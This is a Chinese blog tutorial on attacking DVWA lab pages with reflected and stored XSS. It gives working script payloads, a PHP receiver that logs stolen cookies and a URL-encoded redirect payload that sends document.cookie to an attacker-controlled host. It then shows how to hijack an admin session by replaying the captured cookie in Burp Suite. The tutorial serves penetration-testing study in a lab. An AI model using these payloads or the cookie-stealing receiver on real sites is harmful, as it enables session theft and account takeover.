最新公告
  • 欢迎光临icbug创客,本站所有的文章全部开放!部分资源需付费!立即加入我们会员
  • Kali-用户Cookie信息并实现无账号登录

    大家一定都经历过乱七八糟的不良网站的弹窗吧!

    这种网站一般都含有xss的攻击代码,只不过是被打了伪装而已

    本章就会为大家介绍一下,这其中到底暗藏着什么玄机

    首先我们需要一个DVWA靶机

    搭建教程:https://icbugblog.cn/archives/8/

    注意:这个教程涉及到mariadb需要自己创建一个新的用户才可以使用


    搭建好靶场后我们开始我们的教程

    首先我们先把DVWA的安全等级调为Low,方便我们开始XSS的基础学习


    反向XSS的原理

    我们来演示一下它的工作原理。这个功能类似一个留言板,输入信息后下面会增加对应的信息

    然后我们查看一下地址框上的url链接

    根据回显信息判断出,显示的文本内容是 Hello $name。我们输入的信息被存放在$name 变量中

    我们来添加一条Javascrpt的Js代码来获取我们的cookie

    <script>
    alert(document.cookie); #alert 弹出窗口,窗口中内容是 cookie
    </script>

    或者

    <script>alert( "我是 icbug" );</script>
    <script>alert(document.cookie);</script>

    然后我们把这段代码放到这个框中运行,它会弹出两个对话框,我们可以看到他的回应是Hello

    我们来看第二个对话弹窗

    说明我们的网站有XSS漏洞,他把我们的cookie给显示了出来


    储存型XSS的原理

    存储型 XSS 的优势在于恶意代码被存储到服务器上,比如我们在论坛发帖的过程中嵌入了 XSS 攻击

    代码,当我们发布的帖子被用户浏览访问时就可以触发 XSS 代码。

    做一个示例:

    Name:icbug

    Message:alert(document.cookie);

    一个站点,能写入并被执行,就可以被渗透!

    例子:

    Name:icbug的blog

    Message:2020年最新的教程 alert(document.cookie);

    然后我们使用XSS stored进行操作

    然后我们来看一下结果


    揭秘黑客是如何盗取用户的cookie信息保存到服务器中的

    在 kali 上构建 Web 站点接收 Cookie

    先启动apache

    进入网站根目录

    cd /var/www/html

    然后新建一个用于接受cookie信息的PHP

    vim index.php

    写入

    <?php
    $cookie=$_GET['cookie'];
    file_put_contents('cookie.txt',$cookie);
    ?>

    注:页面中创建 cookie 变量,然后将 cookie 变量写入 cookie.txt

    然后修改一下网页的权限

     ps -axu | grep apache

    查看运行 apache 进程的用户名

    授予权限

     chown www-data:www-data index.php

    创建cookie.txt

     touch cookie.txt

    给cookie.txt授予权限

    chown www-data:www-data cookie.txt
     service apache2 start

    URL构建

    利用 xss 反射漏洞进行攻击

    我们接收 Cookie 的 Url 为http://192.168.1.199/index.php

    构建 XSS payload

    <script>document.location='http://192.168.1.199/index.php?cookie='+document.coo
    kie</script>

    我们的完整URL是:

    http://192.168.218.132/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.1.199%2Findex.php%3Fcookie%3D%27%2Bdocument.coo+kie%3C%2Fscript%3E#

    这样的话浏览器有时会拒绝,所以我们需要用payload对url进行加密


    打开burpsuite

    把我们需要加密的代码复制进去并按照下图下图操作(注意是script代码不是加密网址)

    然后把输出的URL进行拼接

    拼接完成后如下

    http://192.168.218.132/dvwa/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%39%39%2f%69%6e%64%65%78%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%0a%6b%69%65%3c%2f%73%63%72%69%70%74%3e

    注:这个加密链接想直接访问,必须提前登录上 DVWA 链接。

    访问后跳转到了一个空白页面,这个空白页面就是我们获取cookie的程序

    http://192.168.1.199/index.php?cookie=undefined

    这个时候我们的cookie就已经传到了我们的cookie.txt文本中

    然后查看一下我们的cookie

     cat /var/www/html/cookie.txt

    这个是我们的Kali Linux的那台cookie获取机的查看代码

    因为我们没有使用cookie调用所以返回代码为undefined

    同时我们看到地址栏中也是undefined,说明我们的cookie已经读取成功了


    然后我们开启burpsuite 截断

    然后我们配置一下Kali的火狐代理

    DVWA 中内置了一些其他用户,在 kali 系统中打开火狐浏览器,这里我们使用

    用户名:smithy 密码:password 登录 DVWA.

    打开 burpsuit 放行第一个请求,因为该请求携带用户名和密码

    将存在 Cookie 信息的请求发送到 Repeater 进行重放攻击

    替换用户 Cookie 信息

    将现在的普通用户的 cookie 信息替换成前期抓到的 admin cookie 信息

    admin 的 cookie 信息是:

    Security:low PHPSESSID :up79966c556rikm9kfcsfbv2u7

    开始替换:

    进入 repeater 中继中

    点击 Go 返回状态码 200 表示成功

    点击 Show response in browser 在浏览器中打开。

    点击 Copy

    浏览器中访问

    成功切换为 admin 用户


    The End...

    icbug创客严格遵守文章协议!请勿侵犯作者权益复制直接转载,如需转载请标明出处!
    icbug创客 » Kali-用户Cookie信息并实现无账号登录

    发表评论

    • 650会员总数(位)
    • 189资源总数(个)
    • 3本周发布(个)
    • 0 今日发布(个)
    • 224稳定运行(天)

    提供最优质的资源集合

    立即查看 了解详情